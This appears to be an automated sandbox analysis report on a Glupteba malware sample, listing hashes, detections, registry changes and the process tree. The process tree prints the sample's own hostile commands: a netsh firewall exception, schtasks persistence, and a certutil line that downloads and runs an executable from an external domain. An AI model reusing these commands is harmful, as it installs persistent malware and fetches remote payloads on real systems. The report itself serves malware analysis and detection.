Analysis
-
max time kernel
139s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
12-06-2022 01:42
Static task
static1
Behavioral task
behavioral1
Sample
2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe
Resource
win10v2004-20220414-en
General
-
Target
2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe
-
Size
3.9MB
-
MD5
d7cdd366a076f32d242bd88450bde311
-
SHA1
f793c13a8374d1d8dd4cb120b376e39c637b251b
-
SHA256
2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d
-
SHA512
778ab03c6ba1914d00a2cbf55aee4929c426613484d0245d260406085391b0c57c008ce2d97d7e04277f14f68840dddd1070625b9e6fd0947b9f07e7a17d2850
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 9 IoCs
Processes:
resource yara_rule behavioral2/memory/2824-131-0x0000000003280000-0x0000000003A84000-memory.dmp family_glupteba behavioral2/memory/2824-132-0x0000000000400000-0x0000000000F97000-memory.dmp family_glupteba behavioral2/memory/2824-133-0x0000000000400000-0x0000000000F97000-memory.dmp family_glupteba behavioral2/memory/2824-135-0x0000000000400000-0x0000000000F97000-memory.dmp family_glupteba behavioral2/memory/3616-137-0x0000000000400000-0x0000000000F97000-memory.dmp family_glupteba behavioral2/memory/3616-140-0x0000000000400000-0x0000000000F97000-memory.dmp family_glupteba behavioral2/memory/3616-144-0x0000000000400000-0x0000000000F97000-memory.dmp family_glupteba behavioral2/memory/4616-146-0x0000000000400000-0x0000000000F97000-memory.dmp family_glupteba behavioral2/memory/4616-147-0x0000000000400000-0x0000000000F97000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid process target process PID 3396 created 2824 3396 svchost.exe 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe PID 3396 created 4616 3396 svchost.exe csrss.exe PID 3396 created 4616 3396 svchost.exe csrss.exe PID 3396 created 4616 3396 svchost.exe csrss.exe -
Executes dropped EXE 2 IoCs
Processes:
csrss.exepatch.exepid process 4616 csrss.exe 1388 patch.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmallCherry = "\"C:\\Windows\\rss\\csrss.exe\"" 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 848 bcdedit.exe -
Drops file in Windows directory 2 IoCs
Processes:
2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exedescription ioc process File opened for modification C:\Windows\rss 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe File created C:\Windows\rss\csrss.exe 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4268 schtasks.exe 2872 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" csrss.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.execsrss.exepid process 2824 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe 2824 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe 3616 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe 3616 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe 4616 csrss.exe 4616 csrss.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exesvchost.execsrss.exedescription pid process Token: SeDebugPrivilege 2824 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe Token: SeImpersonatePrivilege 2824 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe Token: SeTcbPrivilege 3396 svchost.exe Token: SeTcbPrivilege 3396 svchost.exe Token: SeBackupPrivilege 3396 svchost.exe Token: SeRestorePrivilege 3396 svchost.exe Token: SeBackupPrivilege 3396 svchost.exe Token: SeRestorePrivilege 3396 svchost.exe Token: SeBackupPrivilege 3396 svchost.exe Token: SeRestorePrivilege 3396 svchost.exe Token: SeBackupPrivilege 3396 svchost.exe Token: SeRestorePrivilege 3396 svchost.exe Token: SeSystemEnvironmentPrivilege 4616 csrss.exe Token: SeBackupPrivilege 3396 svchost.exe Token: SeRestorePrivilege 3396 svchost.exe Token: SeBackupPrivilege 3396 svchost.exe Token: SeRestorePrivilege 3396 svchost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
svchost.exe2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.execmd.execsrss.exedescription pid process target process PID 3396 wrote to memory of 3616 3396 svchost.exe 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe PID 3396 wrote to memory of 3616 3396 svchost.exe 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe PID 3396 wrote to memory of 3616 3396 svchost.exe 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe PID 3616 wrote to memory of 3244 3616 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe cmd.exe PID 3616 wrote to memory of 3244 3616 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe cmd.exe PID 3244 wrote to memory of 3924 3244 cmd.exe netsh.exe PID 3244 wrote to memory of 3924 3244 cmd.exe netsh.exe PID 3616 wrote to memory of 4616 3616 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe csrss.exe PID 3616 wrote to memory of 4616 3616 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe csrss.exe PID 3616 wrote to memory of 4616 3616 2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe csrss.exe PID 3396 wrote to memory of 4268 3396 svchost.exe schtasks.exe PID 3396 wrote to memory of 4268 3396 svchost.exe schtasks.exe PID 3396 wrote to memory of 2872 3396 svchost.exe schtasks.exe PID 3396 wrote to memory of 2872 3396 svchost.exe schtasks.exe PID 3396 wrote to memory of 1388 3396 svchost.exe patch.exe PID 3396 wrote to memory of 1388 3396 svchost.exe patch.exe PID 4616 wrote to memory of 848 4616 csrss.exe bcdedit.exe PID 4616 wrote to memory of 848 4616 csrss.exe bcdedit.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe"C:\Users\Admin\AppData\Local\Temp\2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824 -
C:\Users\Admin\AppData\Local\Temp\2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe"C:\Users\Admin\AppData\Local\Temp\2368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:3924
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:4268
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:2872
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
PID:1388
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:848
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3396
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
Filesize
3.9MB
MD5d7cdd366a076f32d242bd88450bde311
SHA1f793c13a8374d1d8dd4cb120b376e39c637b251b
SHA2562368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d
SHA512778ab03c6ba1914d00a2cbf55aee4929c426613484d0245d260406085391b0c57c008ce2d97d7e04277f14f68840dddd1070625b9e6fd0947b9f07e7a17d2850
-
Filesize
3.9MB
MD5d7cdd366a076f32d242bd88450bde311
SHA1f793c13a8374d1d8dd4cb120b376e39c637b251b
SHA2562368799bc40e3c6a7895db71b9491866016df177c1a00c8296af9964101fef8d
SHA512778ab03c6ba1914d00a2cbf55aee4929c426613484d0245d260406085391b0c57c008ce2d97d7e04277f14f68840dddd1070625b9e6fd0947b9f07e7a17d2850